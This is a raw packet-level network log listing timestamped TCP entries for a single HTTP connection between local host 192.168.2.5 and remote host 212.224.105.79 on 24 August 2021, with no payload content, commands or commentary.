Aug 24, 2021 08:49:17.400935888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400949955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400954008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400971889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400989056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.401000977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.401000977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.401020050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.401036978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.401057959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.412328005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.423949957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.423986912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424005032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424021959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424037933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424058914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424078941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424088001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424096107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424113035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424129963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424145937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424154043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424161911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424179077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424185038 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424199104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424206018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424216986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424233913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424233913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424249887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424266100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424277067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424283981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424300909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424312115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424316883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424336910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424338102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424355030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424365044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424371004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424386978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424397945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424402952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424417973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424429893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424433947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424449921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424453974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424470901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424489975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424503088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424505949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424521923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424524069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424537897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424555063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424571037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424586058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424587011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424607992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424627066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424628973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424643993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424654007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424663067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424679995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424684048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424699068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424715996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424726963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424732924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424746037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424760103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424766064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424779892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424798012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424803019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424813986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424817085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424829960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424841881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424856901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424870014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424870968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424885035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424895048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424901962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424913883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424926996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424936056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424940109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424952984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424952984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424966097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424981117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.424998045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.424998045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425018072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425035000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425050974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425067902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425069094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425081968 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425085068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425103903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425107956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425121069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425137043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425153017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425163031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425168991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425184011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425199986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425200939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425215960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425226927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425235033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425246000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425252914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425267935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425283909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425283909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425299883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425317049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425328970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425342083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425342083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425353050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425358057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425374985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425375938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425395012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425399065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425412893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425429106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425440073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425445080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425470114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425481081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425486088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425502062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425514936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425518036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425534964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425545931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425549984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425565958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425575972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425585985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425604105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425618887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425630093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425635099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425651073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425667048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425672054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425682068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425697088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425717115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425718069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425734043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425744057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425749063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425765991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425781965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425781965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425797939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425813913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425817966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425828934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425839901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425848961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425865889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425865889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425882101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425898075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425914049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425914049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425930977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425936937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425947905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425962925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.425976992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.425982952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426000118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426007032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426014900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426031113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426033974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426047087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426063061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426075935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426079035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426101923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426111937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426121950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426137924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426150084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426153898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426173925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426177979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426191092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426207066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426218987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426222086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426238060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426245928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426254034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426271915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426284075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426287889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426306963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426315069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426326036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426342010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426357985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426357985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426371098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426383018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426388979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426407099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426422119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426428080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426439047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426455975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426465988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426472902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426490068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426490068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426506042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426512003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426526070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426543951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426543951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426558971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426574945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426590919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426599979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426606894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426624060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426634073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426640034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426659107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426662922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426676989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426682949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426692009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426707983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426719904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426723957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426740885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426748991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426755905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426773071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426790953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426798105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426809072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426825047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426835060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426841021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426853895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426856041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426872015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426887035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.426896095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.426938057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.434509039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434536934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434550047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434561968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434575081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434588909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434607029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434624910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434640884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434657097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434655905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.434673071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.434686899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.434737921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449058056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449094057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449109077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449121952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449139118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449151993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449165106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449182034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449198008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449214935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449229956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449246883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449263096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449282885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449300051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449316025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449331999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449348927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449357033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449363947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449382067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449398041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449417114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449420929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449434042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449449062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449453115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449465990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449477911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449482918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449500084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449507952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449517012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449533939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449539900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449554920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449573040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449573994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449589014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449604988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449620962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449626923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449635983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449651003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449652910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449670076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449688911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449695110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449706078 CEST	80	49712	212.224.105.79	192.168.2.5
